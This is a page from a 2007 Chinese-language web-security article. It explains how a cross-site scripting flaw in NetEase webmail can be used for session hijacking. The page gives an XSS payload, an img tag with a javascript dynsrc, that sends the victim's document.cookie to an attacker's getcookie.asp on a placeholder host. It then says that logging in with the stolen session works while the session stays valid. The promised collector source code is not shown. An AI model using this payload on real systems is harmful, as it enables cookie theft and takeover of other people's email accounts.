跨站漏洞让网易邮箱成为黑客后院-网络安全专区

跨站漏洞让网易邮箱成为黑客后院

作者：ET.badman 编辑：林洪技 2007-06-27 10:59

3.session欺骗

上面只是一个测试，现在所讲的方法可以让攻击者在有效时间内登陆受害者的邮箱，这就是session欺骗。Session的默认有效时间是20分钟，当攻击者截取到session，同时受害者没有注销掉会话记录的时候，欺骗就成功了。

    同样勾选“编辑源码”，填入以下内容：
    <img dynsrc=javascript:window.location.href=''http://yourwebsite.com/getcookie.asp?msg=''+document.cookie>。

    意思是访问你的服务器上getcookie.asp文件，这个文件用于收取访问者的cookie，收取后在你的服务器上生成指定文件。如图：

getcookie.asp的源码是：

第1页：XSS（跨站脚本）攻击的概念第2页：利用跨站脚本获取cookie 第3页：跨站攻击session欺骗第4页：跨站漏洞最危险的利用

关注我们